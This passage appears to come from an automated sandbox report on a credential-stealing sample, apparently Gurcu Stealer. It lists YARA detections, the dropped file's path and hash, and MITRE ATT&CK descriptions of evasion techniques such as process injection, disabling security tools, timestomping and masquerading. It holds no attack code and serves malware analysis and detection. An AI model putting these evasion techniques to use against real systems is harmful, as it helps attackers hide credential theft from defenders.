0000000C.00000002.2426367415.000001F58045A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5803E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5805AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580457000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58058A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580408000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58052B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58038E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580364000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580593000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580599000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5805C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5803B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5803B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580489000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580537000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5803CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58048C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580534000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580596000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58053A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58045D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5805C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5805AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F580437000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F58052E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000C.00000002.2426367415.000001F5804E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2426367415.000001F580001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	16:52:01
Start date:	01/12/2024
Path:	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe
Imagebase:	0x21b506b0000
File size:	501'760 bytes
MD5 hash:	A338043C6B5260DF6B7CE4C4EC3D1B80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52938000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B6E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52974000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52922000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5296B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5290C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B03000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5291F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5298B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AAA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B4D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5298E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B4A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5294E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52935000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B5296E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AB3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B529B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A7B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000000E.00000002.2428626323.0000021B52AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2428626323.0000021B525C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

